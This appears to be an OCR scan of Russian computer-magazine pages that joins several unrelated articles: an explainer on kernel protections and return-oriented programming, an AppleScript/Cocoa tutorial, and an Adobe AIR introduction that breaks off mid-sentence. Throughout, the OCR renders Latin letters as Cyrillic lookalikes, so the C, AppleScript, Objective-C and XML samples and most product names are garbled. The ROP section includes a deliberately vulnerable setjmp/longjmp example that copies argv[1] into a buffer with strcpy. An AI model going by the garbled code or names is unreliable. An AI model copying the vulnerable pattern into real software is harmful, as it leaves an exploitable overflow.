защищено от инжекта кода руткитами из пользовательского режима. 
Одна из самых распространенных идей, которые были реализо- 
ваны в этом направлении, — это цифровая подпись модулей ядра 
(хоть она раньше и была неоднократно скомпрометирована). Если 
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Частота встречаемости байт после инструкции косвенного перехода 



в операционной системе включена такая опция, то 
каждый модуль, загружаемый в ядро, должен содержать 
в себе валидную цифровую подпись, которая, в свою 
очередь, должна быть проверена и загружена в корне- 
вой каталог сертификации (гооі сегббсаііоп аиібогііу, 
СА). Если такая проверка не пройдет, то модуль, соот- 
ветственно, не будет загружен. Напомню, что подобную 
методику впервые внедрила в свои операционные 
системы МісгозоІТ, начиная с ѴѴіпсІоѵѵз ХР. Вместе с тем, 
безопасность такого подхода всего лишь опирается 
на предположение, что само ядро и все загруженные 
модули (драйверы) не содержат уязвимостей, которые 
позволят выполнить неподписанный код и таким обра- 
зом скомпрометировать систему. Что же делать? 

Был разработан другой метод, направленный на предот- 
вращение эксплуатации потенциальных уязвимостей 
программного обеспечения во время выполнения. 

Уверен, что ты слышал об этом подходе, который в первую 
очередь касается виртуальных адресов: страница памя- 
ти не может быть одновременно доступной на запись и 
выполнение кода (говоря кодерским языком, странице 
памяти не могут быть установлены атрибуты ѴѴРІТАВІ_Е I 
ЕХЕСІЛАВЕЕ). Данная техника была впервые внедрена 
в ОрепВБО 3.3, а позже похожие системы защиты появи- 
лись и в других ОС — например, РаХ и ЕхесБЬіеІсІ в Біпих. 
В семействе ОС ѴѴіпсіоѵѵб эта система защиты более 
известна как Оаіа Ехесибоп Ргеѵепііоп ЮЕР), которая 
была впервые реализована в ѴѴіпсІоѵѵз ХР БР 2 и ѴѴіпсІоѵѵз 
Бегѵег 2003. 

БЕР реализуется на аппаратном и программном уровне. 
Начиная с пакета обновления 2 (5Р2) для ѴѴіпсІоѵѵз ХР 
32-разрядная версия ѴѴіпсІоѵѵз использует один из сле- 
дующих методов: функцию по-ехесиіе раде-ргоіесбоп 
(І\ІХ), разработанную компанией АМБ, и функцию 
Ехесиіе ОізаЫе Віі (Хй), разработанную компанией 
Іпіеі. Основным преимуществом, которое обеспечивает 
функция БЕР, является возможность предотвратить 
запуск кода из областей данных (таких как куча, стек или 
пул памяти). Подробнее о технологии и возможностях 
БЕР можно прочитать здесь: зиррогЕтісгозоІТ.сопп/ 
кЬ/875352/ги . 

На этом программистские умы не успокоились, и была 
изобретена технология, которая позволяла поддерживать 
целостность ядра в режиме выполнения. Она получила 
название «тетогу збасіоѵѵіпд». Эта технология реали- 
зована как монитор виртуальной машины, которая под- 
держивает раздельно существующие так называемые 



«регионы теневой памяти». Теневая память недоступна 
для гостевой учетной записи ѴМ и содержит только копии 
некоторых участков основной памяти гостевой учетной 
записи. Новый исполняющийся код (то есть код, который 
исполняется в первый раз) аутентифицируется в системе 
путем сравнения значений простого криптографического 
хеша и только затем копируется в теневой участок памяти. 
Так как монитор виртуальной памяти в данной модели 
является доверенным по умолчанию, то это гарантирует 
невозможность неавторизованных модификаций в тене- 
вой памяти. Таким образом, код, запускающийся из-под 
гостевой записи, никогда не сможет получить доступа к 
привилегированной теневой памяти. В настоящее время 
технологию теневой памяти поддерживают ѵѵіп-системы 
начиная с ѴѴіп2к и ядра Ыпих начиная с 2.4. Кроме того, 
эта технология реализована в виртуальных машинах 
ОЕМІІ, ѴМѵѵаге и ѴігІиаІВох. 



Возвратно-ориентированное 

программирование 



Уф, сам не знаю, что это такое, но судя по всему — тер- 
моядерная штука. В самом ближайшем будущем ждите 
на экранах планеты руткиты, которые в своей основе 
будут использовать фичи возвратно-ориентированного 
кодинга (ВОК). ВОК позволяет атакующему эксплуатиро- 
вать ошибки памяти в таргет-программах (как правило, 
уязвимости типа переполнения буфера и тому подобное) 
без фактического инжекта кода в адресное пространство 
этой программы. Не дошло? Повторю. Раньше для того, 
чтобы заэкплойтить программу/систему, нужно было 
искать в установленных программах ошибки, благодаря 
которым можно переписать адрес возврата из функции 
на нужный адрес и таким образом получить контроль над 
программой. Но найти такие случаи — большая редкость. 
Так вот, теперь этого делать не нужно. В атаке на систему 
злоумышленник должен организовать короткие последо- 
вательности инструкций процессора в целевой програм- 
ме. Через выбор этих последовательностей злоумышлен- 
ник окажется в состоянии обеспечить нужное поведение 
целевой программы. Обычно последовательность дей- 
ствий выбирается таким образом, чтобы каждое действие 

оканчивалось инструкцией процессора ге1игп( азт геі 

), что (при условии контроля за стеком) позволит злоу- 
мышленнику контролировать ход выполнения программы. 
Кстати, именно по имени инструкции процессора — геіигп 
— эта техника программирования и получила название 
возвратно-ориентированной. 




> СІѴСІ 

На диске ты найдешь 
книгу К. Касперски 
«Техника сетевых 
атак», в которой 
очень подробно 
разжевывается тех- 
ника переполнения 
буфера, а также книгу 
«19 смертных грехов, 
угрожающих безо- 
пасности программ» 
Майкла Ховарда, 
прочитать которую я 
рекомендую каждому 
кодеру. 
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А сколько у тебя установлено виртуальных машин? 



Организационный блок инструкций в ВОП называется гаджетом и 
содержит в себе последовательность команд, адресов и данных, кото- 
рые при запуске заставляют программу вести себя вполне прогнози- 
руемым и нужным злоумышленнику образом. 

Инструкция геі обладает двумя особенностями. Во-первых, ей 
нужно выделить 4 байта на вершине стека и присвоить указа- 
телю инструкции ЕІР это значение. Во-вторых, она увеличива- 
ет указатель стека Е5Р на 4 таким образом, что вершина стека 
будет являться новым словом (2 байта] над тем словом, которому 
раньше был определен ЕІР. Эти особенности и используются для 
изменения последовательности инструкций, так как каждая после- 
довательность может быть записана в стек. Когда исполняется 
последовательность команд, достигается исполнение инструкции 
геі, которая их заканчивает и обеспечивает переход к дальнейшей 
последовательности команд. 

Тут обязательно стоит упомянуть, что присутствие инструкции геіигп 
в гаджете вовсе не обязательно. Тот, кто мало-мальски разбирается 
в АЭМ’е и умеет на нем кодить, знает, что геіигп-подобной инструк- 
цией является выражение вида РОР ЕАХ; ЛЧР ЕАХ. Здесь, в отличие 
от вышеуказанных особенностей команды геі, достаточно только 
переписать регистр ЕАХ и глупый процессор безмятежно прыгнет по 
указанному нами адресу. При этом геіигп-подобные инструкции не 
ограничиваются только этим вариантом — при желании вариации на 
тему можно сильно разнообразить. 

Интересно, а какова вероятность встретить команду геі или иные 
геіигп-подобные команды в стандартной программе? Очень вели- 
ка. На х86-машинах команда возврата геі занимает один байт (сЗ) 
и теоретически будет встречаться с частотой 1/256. Хотя на самом 
деле — гораздо чаще, потому что среднестатистические (то есть, 
все законные) программы всегда будут использовать эту инструк- 
цию, так что встретить ее в потоке байт будет несложно. Вместе с 
тем непрямые переходы с использованием регистров занимают 
два байта, и поэтому вероятность встретить их в программе будет 
гораздо ниже. 



Рго & Соп$ 

Возвратно-ориентированное программирование, как ты уже понял, 
является реальной альтернативой инжекту кода и захвату системы. 
Сейчас мы рассмотрим четыре вида ошибок памяти, которые на руку 
злоумышленнику и могут быть применены для использования всех 
прелестей ВОП. При всем при этом, атакующему еще нужно будет 
позаботиться о возможности контролирования стека (регистры ЕІР и 
Е5Р), а также решить вопрос размещения кода гаджета в памяти. 

Ошибка #1: Переполнение буфера 

Ну что тут сказать? Если ты не знаешь, что это такое, то вообще уди- 
вительно, каким образом ты дочитал статью до этого места :). Для 
устранения пробелов в образовании могу лишь посоветовать почи- 
тать К. Касперски, он тему переполнения буфера распилил от и до. 
Суть переполнения буфера заключается в появлении возможности 
переписать указатель следующей инструкции ЕІР в стеке какой-либо 
функции и таким образом получить контроль над ее выполнением. 

При реализации атаки ВОП это будет первая инструкция в гаджете, 
который будет выложен в стек. При этом указатель стека Е5Р будет 
указывать на следующее слово в стеке, которое также находится под 
контролем злоумышленника. Для того, чтобы воспользоваться пере- 
полнением буфера при реализации ВОП, злоумышленник должен 
переписать кадры стека таким образом, чтобы избежать изменения 
любых сохраненных значений ЕІР. 

Ошибка #2: перезапись указателя ѵіаЫе 
вС++ 

Опытные разработчики С++ знают, что можно контролировать память 
путем манипуляций с объектами виртуальных таблиц (ѵіаЫе). В нашем 
случае, если появилась возможность контролировать ѵіаЫе, то поче- 
му бы не переписать его так, чтобы он указывал на подконтрольный 
регион памяти? В зависимости от кода, который компилятор создает 
для виртуального вызова метода, наша последовательность команд 
будет эксплойтить один или несколько регистров, которые использу- 
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Небольшой экскурс в историю 



ются ѵІаЫе и указывают на объект, виртуальную таблицу 
или сразу на них обоих. Злоумышленник должен просто 
использовать такие указатели для изменения указателя 
стека. Справедливости ради отмечу, что потенциальная 
возможность использовать виртуальные таблицы для 
перезаписи указателя зависит от версии компилятора и 
флагов. Посему гаджет В0П легко окажется в пролете, ибо 
способ изменения ѵІаЫе, оказывается, ненадежен. 

Ошибка #3: перезапись указателя 
на функцию 

Как и в случае с перезаписью ѵІаЫе, перезапись указателя 
на функцию не является достаточно надежным методом 
и серьезно ограничивает возможности злоумышленника. 
Во-первых, дело в стеке, который использует эта функция 
и который гаджету придется как-то перемещать. В той же 
последовательности инструкций гаджет должен реализовать 
вторую последовательность для выполнения кода. В общем, 
пока такая возможность существует только теоретически. 

Ошибка #4: перезапись буфера 
функции $е!)тр 

И вот благочестивый І_іпих неожиданно оказался под уда- 
ром. Виной всему — функции зе^'тр и 1опд_|'тр, которые 
реализуют нелокальные переходы доіо. 

Кошмарные, на мой взгляд, функции — сточки зрения 
не только системного кодинга, но и кодинга вообще... 

При вызове функции зе^тр программа выделяет место 
в структуре ітр-Ьіф которая хранит значения регистров 
ЕВХ, ЕйІ, ЕЗІ, ЕВР, ЕЗР и ЕІР Здорово, правда? В сохра- 
ненный в буфере указатель инструкций ЕІР с помощью 
инструкции САН записывается текущее значение, а 
также сохраняется значение ЕЗР. При выходе из зе^пгір 
в регистре ЕАХ будет хранится нуль. Позднее вызывается 
функция Іо п д і пп р . Эта функция восстанавливает прежнее 
значение основных регистров, заносит в регистр ЕАХ вто- 
рой аргумент, переданный функции Іо п д ] т р , устанавлива- 
ет регистр ЕЗР и прыгает по этому адресу. 



Пример использования функций зеіітр/іопдітр 

зЦгисЦ Іоо 
{ 

сііаг Ъиііег [ 160 ] ; 

Зтр_Ьи:Е зЬ; 

} ; 

іпС таіп( іпС агдс , сЪаг **агдѵ ) 

{ 

зСгисС Іоо = таііос ( зігеоі: (*б) ) ; 
І1( зеСзтр ( 1->зЬ) ) 
геСигг. О ; 

зСгсру( 1->Ьи11ег, агдѵ[1] ); 

1опдзтр( 1->зЬ, 1 ); 

} 

Обрати внимание на строку зігсруі б- > Ьиббег, агдѵ[1] ). 
По-моему, ее даже пояснять не нужно. И пусть *піх- 
кодеры теперь решат для себя, стоит ли использовать эти 
функции в своих программах :). 

Заключение 

Итак, что мы получили? На мой взгляд, ВОП являет- 
ся крайне коварной вещью для обеспечения общей 
безопасности системы. Ведь стоит злоумышленнику 
пропатчить ядро, какой-нибудь драйвер, систем- 
ный файл — и все! Для этого даже не нужно искать 
способы нелегального внедрения в нулевое кольцо, 
чтобы поставить систему на колени. Все оказывается 
гораздо проще. И ведь уже существуют практические 
наработки, которые реализуют возможность контро- 
лировать систему, используя вышеописанные методы 
ВОП. 

Возвратно-ориентированный кодинг — чрезвычайно 
интересная и практически не изученная тема. Простора 
для фантазии — море, возможностей для исследования 
— как снега в Сибири, и трудолюбивому кодеру эту тему 
копать — не перекопать. 

Удачного компилирования и да пребудет с тобой Сила! □с 




НТТР://ѴѴѴѴѴѴ 

1Г 

> Ііпкз 

Как показывает моя 
практика, для айтиш- 
ника, занятого вопро- 
сами безопасности 
компьютерных систем, 
наиболее значимыми 
оказываются вовсе не 
официальные сайты 
каких-либо системных 
контор (хотя М50ІХ это 
не касается]. Самые 
ценные крупицы ин- 
формации собираются 
на блогах активистов 
андеграунда, кодо- 
копателей и прочих. 

В качестве примера 
назову ресурсы Ыод. 
іЬгеаІехрегЕсопп и 
аіех-іопезси.сот . 
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Начинаем программировать на АррІеЗсгірІ 

о Из этой статьи ты узнаешь, что такое АррІеЗсгірІ, зачем и кому 
он нужен, как можно автоматизировать чужие приложения 
и добавлять возможность автоматизации в свои. 



Автоматизируй это 

Часто встречаются такие задачи, для решения которых делать отдель- 
ный проект на компилируемом языке нерационально. Например, 
когда нужно быстро слепить на коленке код, который должен просто 
выполнять конкретную работу — без всяких 0111-украшений, обработ- 
ки всевозможных исключительных ситуаций, оптимизации и прочего. 
Здесь на помощь и приходят языки сценариев — известные тебе 
зЬеІІ, Регі, РНР и так далее. Все они (ну или почти все) доступны и 
под Мае 05 X. Но в этой операционке в дополнение к общепринятым 
скриптовым языкам есть и специальный язык сценариев, ориентиро- 
ванный именно на Мае 05 X и тесно с ней связанный. Это АррІеВсгірН 
АррІе5сгірІ идет вместе с системой начиная с 5узІепп 7. Выросший 
из проекта НурегСагб (который содержал скриптовый язык 
НурегТаІк, очень похожий на естественный английский), АррІе5сгі рі 
первоначально создавался для того, чтобы обеспечить обмен дан- 
ными между задачами, а также для управления работой сторонних 
приложений. Сам по себе АррІе5сгірІ обладает довольно скромной 
функциональностью: на этом языке даже сценарии для выполнения 
сравнительно простых задач часто выглядят как обращение к другим 
приложениям. Впрочем, после существенной перестройки системы 
при переходе к линейке Мае 05 X язык АррІе5сгірІ стал боле гиб- 
ким и мощным, а новый фреймворк Сосоа позволил разработчикам 
встраивать в свои приложения возможность автоматизации с помо- 
щью АррІе5сгір1:’а с минимальными усилиями. 

Простой сценарий 

Для редактирования и исполнения скриптов мы будем 
использовать стандартный 5сгірІ Ебііог. Найти его можно в 



папке /АррІісаІіоп/АррІе5сгірІ. Для начала напишем простой 
«НеІІоѴѴогІсГный» скрипт. 

сіізріау аІегВ "Неііо ЭДогІсП " # Покажем диалог 
зау "Неііо ЭДогІсІ" # Вывод в колонки 

Объяснять тут, думаю, ничего не нужно, но хочется отметить крайне 
простой доступ к синтезатору речи из АррІе5сгірІ с помощью команды 
зау. Вот это и есть настоящее общение с пользователем в стиле Арріе 
:). Конечно же, этот диалог можно легко кастомизировать. Например, 
добавить нужные кнопки: 

Панель с дополнительными кнопками 

сіізріау аІегВ "Неііо ШгІсП " ЪиВВопз {"Неііо", "Вуе" } 
зеВ апзмег Во ЬиВВоп геВигпес! оВ ВНе гезиІВ 
ІВ апзчлег із "Неііо" ВНеп 

еізе 

епсі ІВ 

Теперь напишем что-нибудь более полезное. Например, дадим поль- 
зователю выбрать файл и прочитаем его содержимое: 

# Панель выбора файла 

зеВ ВЬеРіІе Во (сВюозе Вііе отівіі рготрВ 

" ЗеІесВ а Вііе Во геаб: " оВ Вуре {"ТЕХТ" }) 
ореп Вог ассезз ВНеРіІе 
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Функциональность, которую ІТипез экспортирует в 
АррІеЗспрі 

# Читаем контент 

зеЪ ііІеСоггЬепЪв Со (геай ЫіеРіІе) 
сіозе ассезз ЫіеРіІе 

На этих примерах хорошо видна основная идея АррІеВсгірі — он 
очень близок к живому английскому языку. Поэтому читать скрипты 
легко даже для человека, далекого от кодинга. Каждая команда- 
глагол может быть дополнена существительными- модификаторами и 
параметрами. 

Взаимодействие с приложениями 

Для взаимодействия с другими приложениями АррІеВсгірі использует 
механизм сообщений: 

Ъеіі аррІісаРіоп "МісгозоІЪ Могй" 
фіІР 

епсі Реіі 

С помощью команды Іеіі выбираем приложение, которому мы будем 
отправлять сообщение. В данном случае мы просим МВ ѴѴогб завер- 
шиться. В блоке «Іеіі — епб Іеіі» может быть отправлено любое коли- 
чество команд. Сообщения, которые отсылаются приложению, могут 
быть и более специфичными. Все зависит оттого, какие команды реа- 
лизовали его разработчики. ІТипез, например, экспортирует довольно 
много команд и свойств в среду АррІеВсгірі: 

Запускаем нужный плейлист в ІТипез 

Реіі аррІісаРіоп "ІТипез" 

ріау РЬе ріауіізр пашей "Му РаѵогіЪе" 
епй Реіі 

Узнать набор сообщений и типов данных, которые приложение экс- 
портирует в среду АррІеВсгірі;, можно, посмотрев его терминологию 
(файл АррЫате.БсгіріРегтіпоІоду в ресурсах приложения). Для этого 
в Всгірі Ебііог’е пойдем в меню «Рііе -> Ореп Оісііопагу -> ...», и выбе- 
рем нужное приложение. 

Чтобы тебе было проще работать с классами и командами, которые 
экспортирует приложение, они организованы в разделы. Все прило- 
жения, которые поддерживают скриптинг, имеют хотя бы два раздела: 
один стандартный и один из более специфичных для данного при- 
ложения разделов. Стандартный раздел содержит набор стандартных 
команд, которые поддерживает любое Мас-приложение: ореп, ргіпі, 
сіозе и диіі. Содержание остальных разделов зависит от фантазии 
разработчиков. 

Выполнение АррІеЗспрі из своего 
приложения 

Если ты пишешь приложение на Оі^'есііѵе-С/Сосоа, то возможно, что 
некоторые вещи будет удобнее сделать с помощью АррІеВсгірі. Для 







Гг'. Ъгйр П.И 1 
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Наш скрипт в Зсгірі Есіііог 

создания и выполнения в Сосоа-приложениях скриптов существует 
класс ЫВАррІеВсгірІ. Вот простой пример его использования — реа- 
лизация получения у приложения іСЬаІ строки статуса пользователя. 

ЫЗАррІеЗсгірЪ *іСЦаЦСеСЗЦаЦизЗсгірР = піі; 
іСЦаССеЦЗЦаЦизЗсгірР = [ [ЫЗАррІеЗсгірР аііос] 

іпіШіЫіЗоигсе : 

@"Ъе11 аррІісаЪіоп \" іСЦаЦ\" 

Со деЦ зЪаРиз теззаде"]; 

БЗЗЪгіпд *зЦаЦизЗЪгіпд = 

[ [іСЦаШеЦЗСаЦизЗсгірР 

ехесиСеАпйКеСигпЕггог : &еггогБісС] зЪгіпдѴаІие] ; 



Возможно, то же самое можно сделать и другим путем, не используя 
созданный во время выполнения скрипт, но вряд ли альтернативный 
код будет выглядеть проще, чем этот. Если скрипты большие, можно 
хранить их в ресурсах бандла и читать при необходимости. 

Автоматизация 
в сосоа-приложении 

Очень полезно добавлять поддержку скриптинга в свои Сосоа- 
приложения, ведь если в твоем приложении есть интерфейс 
к АррІеВсгірі, то пользователь, написав несколько строчек на 
АррІеВсгірі, сможет кастомизировать его для своих нужд и 
интегрировать с другими приложениями, которые у него уста- 
новлены, а затем, например, автоматизировать решение рутин- 
ных задач. 

Чтобы экспортировать типы и команды в среду АррІеВсгірі, необходи- 
мо их описать в специальных файлах. Есть возможность сделать это 
в файлах .зсгіріВиіІе и .зсгіріТегтіпоІоду или в одном файле с рас- 
ширением .зсіеі. В обоих случаях файлы имеют формат ХМЕ, но с зсіеі 
работать проще. 

Содержимое файла зсгіріТегтопоІоду отображается в Всгірі Ебііог’е 
при просмотре словаря приложения. Этот файл содержит описание 
экспортируемых в АррІеВсгірі объектов. 

Открыв зсгіріВиіІе-файл в Ріізі Ебііог’е, можно видеть, что он содер- 
жит следующие основные разделы: 

• АррІеЕѵепіСобе — четырехбуквенный код, который идентифицирует 
приложение для среды АррІеВсгірі (код должен быть уникальным в 
рамках одной системы); 

• Ыате — имя раздела, который содержит экспортируемые команды 
и классы. 

Разбирать внутреннее устройство этих файлов особого смысла нет, так 
как тебе скорее всего придется иметь дело только с зсіеі-файлами. 



Пример 5с1еТ-файла 

<?хш1 ѵегзіоп= " 1 . О " епсойіпд= "ІІТР-8 " ?> 
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с’БОСТУРЕ сІісЕіопагу 8У8ТЕМ " Еііе : / /1оса1Ъ.озС/ 
Зузіет/БіЪгагу/БТБз/зсІеЕ . сіісі" > 
ссіісііопагу СіЕІе="Му АррІісаЕіоп Тегшіпоіоду " > 
<!-- Кастомный раздел --> 

<зиіЕе пате="Му АррІісаЕіоп ЗсгірЕіпд" 
сосіе= " ХХХХ " 

сіезсгірЕіоп= " Соттапсіз апсі с1аззез"> 

<с1аззез> 

<с1азз пате= "аррІісаЕіоп" сос!е= " сарр" 
с!езсгірЕіоп= " " 

іпііегіЕз = "ЫЗСогеЗиіЕе .БЗАрріісаЕіоп " > 
<сосоа сіазз= "ЫЗАрріісаЕіоп" /> 
<ргорегЕіез> 

<!-- экспортируем одно свойство --> 
<ргорегЕу паше=" зоше ѵаіие " 
сосіе= " зѵаі " Еуре= " зЕгіпд" 
сІезсгірЕіоп= " А ѵаіие "> 

<сосоа теЕ1юс1= "ѵаіие " /> 
</ргорегЕу> 

</ргорегЕіез> 

</с1азз> 

</с1аззез> 

</зиіЕе> 

</ сІісЕіопагу > 



В зсІеГе скриптинг-терминология смешана с подроб- 
ным описанием команд и типов, которое можно найти в 
.БегірІіпдЗиіІ-файлах. Реализуем это на практике, создав 
Сосоа-приложение, поддерживающее АррІеВсгірІіпд. Для 
этого в новом Сосоа проекте добавим в файл I пбо . р И 51 фла- 
жок Зсгірііпд и ОЗАЗсгірДпдОеРпіІіоп с именем нашего БСІеб- 
файла: 




ЗсгірЕіпдБеЕіпіЕіопз/СосоаЗЕапсІагсІ. зсіеЕ " 
хроіпЕег= "хроіпЕег ( /сіісЕіопагу/зиіЕе) " /> 



<зиіЕе пате= " ЗсгірЕіпд" сос!е="ѴѴѴѴ" 
сіезсгірЕіоп= "ТезЕ ЗсгірЕіпд"> 

<с1азз паше= " аррІісаЕоп" сос!е= " сарр " 
с!езсгірЕіоп= " "> 

<сосоа сіазз= "БЗАрріісаЕіоп" /> 

<!-- Экспортируем одно геасіопіу свойство 
у аррІісаЕіоп --> 

<ргорегЕу паше= "тургор" 
сос!е= " Зтгр" Еуре= " зЕгіпд " 
ассезз= " г " /> 

</с1азз> 

</зиіЕе> 

</сіісЕіопагу> 

Итак, из АррІеЗсгірі’а у нас доступно одно свойство — 
тургор. Осталось написать О Ь] С - код, который будет обра- 
батывать чтение данного свойства из скриптов. Для этого 
нужно создать категорию ЫЗАррІісаІіоп, поскольку именно 
этот класс мы выбрали в качестве получателя сообщений от 
скриптов. 

#ітрогЕ <Сосоа/Сосоа .іі> 

ѲіпЕегЕасе БЗАрріісаЕіоп (ЗсгірЕіпд) 

- (БЗЗЕгіпд *) тургор; 
іепсІ 



Іпіо.ріізі 

<кеу>Б8Арр1еЗсгірЕЕпаЫеск/кеу> 

<Егие/> 

<кеу>08А8сгірЕіпдБеЕіпіЕіоп</кеу> 
<зЕгіпд>8сгЕірЕіпд . зсіеЕ</ зЕгіпд> 

Добавим к проекту файл 5сгі рііпд .зсіеб следующего содержания: 

Бсгірііпд.зсіеі 

<?хт1 ѵегзіоп= " 1 . О " епсос!іпд= "БТЕ-8 " ?> 

< ! БОСТУРЕ сіісЕіопагу 8У8ТЕМ 
" Еііе : / /ІосаІЬозЕ/ЗузЕет/БіЬгагу /БТБз/ зсіеЕ . сІЕсі" > 
<сіісЕіопагу хт1пз:хі = 

"йЕЕр : / /тт.-ыЗ . огд/2 003 /ХІпсіисіе " 

ЕіЕІе= " ЗсгірЕіпд сіісЕіопагу " > 

<!-- Включим стандартные команды /типы --> 

<хі : іпсіисіе 

ЬгеЕ = " Еііе : / / /ЗузЕет/ЫЬгагу/ 



©ітріетепЕаЕіоп ЫЗАрріісаЕіоп (ЗсгірЕіпд) 

- (БЗЗЕгіпд *) тургор 

{ 

геЕигп @"ТМз із ту ргорегЕу" ; 

} 

Если мы теперь из АррІеЗсгірІ обратимся к свойствам нашего при- 
ложения, то увидим среди них свое свойство и его значение: 

Ееіі аррІісаЕіоп "ЗсгірЕіпд" 
ргорегЕіез 
епсі Ееіі 

Заключение 

Конечно, описать здесь все возможности АррІеЗсгірІ и его взаимо- 
действия с Сосоа-приложениями невозможно. 

Да это и не нужно — для этого есть мануалы. А мы со своей сторо- 
ны продолжим цикл статей о кодинге под эппловские платформы и 
расскажем тебе еще много нового и интересного, ц-ц 
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о Время идет и все меняется. Кто бы мог подумать, что станет 
возможным писать десктопные приложения при помощи связки 
ѵѵеЬ-технологий - НТМІ_+С$$+^ѵа5сгірІ. А ведь это реально уже 
три года! После появления технологии АбоЬе АІК взгляд на 
разработку «настольного» программного обеспечения изменился. 



Платформа АІР не только внесла новизну, но и существенно снизила 
планку для желающих попасть в ряды девелоперов. Это не С++ с 
кучей непонятных ѴѴіпАРІ. В АІР все гораздо проще, и для создания 
профессиональных приложений не нужно быть гуру программирова- 
ния. Немного терпения, чтение попсовых мануалов — и вуаля: ты раз- 
работчик современных решений. 

ѴѴІіа! і$ АсІоЬе АІК 

Начнем с определения. АбоЬе АІР (АбоЬе Іпіедгаіеб Рипііте) — 
это кроссплатформенная среда для выполнения приложений. 



Приложения для этой платформы разрабатываются с приме- 
нением технологий НТМІ_/С55, А ] а х , АбоЬе Ріех и АбоЬе Ріазб. 
Основное назначение платформы — перенос ѵѵеЬ-приложений 
(РІА — Рісб Іпіегпеі Арріісабопз) на десктоп. 

Одной из главных фишек АбоЬе АІР, безусловно, является крос- 
сплатформенность. Уже сейчас созданные приложения пре- 
красно работают на многих платформах (ѴѴіпсіоѵѵб, МасОЭ, І_іпих, 
ОЫХ, АпбгоісІ), количество которых в будущем будет только расти. 
Увы, в этом списке пока нет ѴѴіпсІоѵѵз МоЬіІе/ѴѴіпсІоѵѵз Рбопе. 
Несомненно, этот факт огорчит некоторых разработчиков, но май- 
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Минусы АІВ-приложений 



Несмотря на все громкие слова, у АІР-п рил ожени й есть ряд ми- 
нусов. На мой взгляд, главный из них — кастрированный доступ к 
операционной системе. Настольные приложения в этом контек- 
сте однозначно выигрывают. Если тебе нужен функционал АІР- 
приложения, нотебя не устраивают ограничения в планедоступа к 
возможностям ОС, то обязательно присмотрись к проекту Тііапіит 
(см. соответствующую врезку]. 



крософтовские мобильные поделки в настоящее время постепен- 
но сдают свои позиции, так что процент огорченных окажется не 
таким уж значительным. 

После прочтения всего вышесказанного может сложиться впе- 
чатление, что приложения, созданные на базе АбоЬе АІР, ни 
в коем разе не пригодны к работе без соединения с глобаль- 
ной паутиной. Ведь, как вытекает из определения, основная 
задача технологии — перенос ѵѵеЬ-приложений на компьютеры 
пользователей. Это не совсем так. Приложения для АбоЬе АІР 
могут выполнять задачи, интернет для которых вовсе не нужен. 
Платформа предоставляет им доступ к некоторым функциям ОС 
(файловые операции, буфер обмена, технология бгад апб бгор и 
так далее). 

Как работают АІК-приложения 

АІР-приложения могут функционировать лишь при наличии плат- 
формы (исполнительной среды) АбоЬе АІР. Компилируются они не 
в двоичный, а в промежуточный код, который и будет выполнять- 
ся в среде АбоЬе АІР. Следовательно, если ты написал несколько 
качественных приложений под ѴѴіпсіоѵѵб, то и в ипіх-ііке системах 
они будут работать совершенно аналогично. 

Что нужно для разработки АІК- 
приложении 

Итак, ты решил начать разрабатывать приложения для платформы 
АбоЬе АІР. Что для этого нужно? Как и в любом деле, нам потре- 
буется трезвая голова на плечах. Быстренько проверь ее наличие 
и возвращайся к тексту статьи. 

В плане программного обеспечения тебе понадобится сама 
платформа АІР, 5йК и текстовый редактор для набивания кода 
будущих приложений. Первые два ингредиента ты можешь взять 
с официального сайта ( деЕасІоЬе.сот/аіг/ ). 

К редактору особых требований нет, писать код ты можешь хоть в 
нотпаде, но для удобства лучше всего воспользоваться специали- 
зированным продуктом. Если ты счастливый обладатель толстого 
кошелька, то можешь прикупить редактор от АбоЬе (например, 
Огеатѵѵеаѵег), а если, как и я, предпочитаешь экономить, то 
рекомендую воспользоваться бесплатным Аріапа Зіисііо ( аріапа. 
сот ). Те, кто хоть раз работал с Есіірзе, в Аріапа Зіисііо будут чув- 
ствовать себя как рыба в воде — Аріапа полностью построена на 
Есіірзе, хотя ориентирована сугубо на ѵѵеЬ-разработчиков (Ыті, 
сзз, ]'з). Сразу из коробки Аріапа не готова сотрудничать с АІР 
— чтобы исправить это, тебе потребуется загрузить и установить 
специальный плагин ( аріапа.сот/ргосіисіз/аіг ). 

Воздушный «НеІІо ѵѵогісі» 

Самое время закончить с занудной теорией и попробовать 
сотворить первое приложение для платформы АбоЬе АІР. Я 
надеюсь, что в качестве среды разработки ты выбрал Аріапа 
Віисііо. Если так, то повторяй все шаги за мной, а если нет — 
пытайся разбираться по ходу дела. 

Создай новый пустой проект и присвой ему имя «НеІІоѴѴогІсІ». 
Обрати внимание, что требуется именно пустой проект (вкладка 
«Ѳепегаі -> Рго)есІ»), В этом случае Аріапа создаст голую папку 




Аріапа Зіисііо существенно облегчает процесс разра- 
ботки 



с именем проекта, которая не будет содержать ничего лишнего. 
Все, что потребуется, мы будем создавать самостоятельно. Хотя 
почему самостоятельно? После установки плагина для работы 
с АІР доступен специальный мастер добавления нового АІР- 
проекта. Для создания с его помощью нового проекта достаточно 
нескольких кликов мышкой. Все шаблоны, конфигурационные 
файлы и структура проекта будут созданы автоматически. Правда, 
вместе со скоростью ты также получишь кучу непонятного и 
ненужного кода. С образовательными целями лучше начать 
писать ручками, постепенно разбираясь со всеми тонкостями 
и нюансами. Итак, предположим, что ты создал чистый проект 
и готов творить. Следующим шагом нам необходимо принуди- 
тельно определить тип разрабатываемого проекта. Заходим 
в «Ргорегііез» и в списке слева выбираем «Рго)есІ ІЧаІигез». 
Сделав выбор, в правой части окна ты увидишь список возмож- 
ных «паіигез». Нас интересует лишь «АІР Ыаіиге». Устанавливаем 
напротив него флажок и жмем пимпу с надписью «ОК». С типом 
проекта определились. Теперь надо позаботиться о его структуре. 
Здесь четких правил нет — по факту все создаваемые файлы ты 
можешь кидать в корень проекта. Работать все будет правильно, 
но такой подход нельзя назвать эстетичным. Лучше сразу вырабо- 
тать правила и придерживаться их: пусть первые структуры твоих 
проектов будут простыми, но главное, чтобы они были. То есть 
все твои проекты по структуре должны быть хоть как-то похожи. С 
каждым очередным своим детищем ты будешь прокачивать свои 
навыки, и рано или поздно найдешь оптимальный вариант. 

Пока ты только начинаешь вливаться в мир АІР-разработчиков, 
я рекомендую тебе придерживаться следующих правил: 

1. Соглашение об именовании. Заруби себе на носу, что нужно 
сразу определиться с правилами именования файлов в проекте. 
Если тебе удобно писать названия файлов с маленькой буквы, 
то старайся так и делать. Не нужно каждый раз лепить новый 
«шедевр». Это относится не только к файлам, но и к именам 
переменных. Нужно придерживаться одного стиля. А если стиля 
нет, то как быть? Отвечаю. Нужно смотреть демонстрационные 
примеры, поставляемые с 50К. Их писал не абы кто, а люди, 
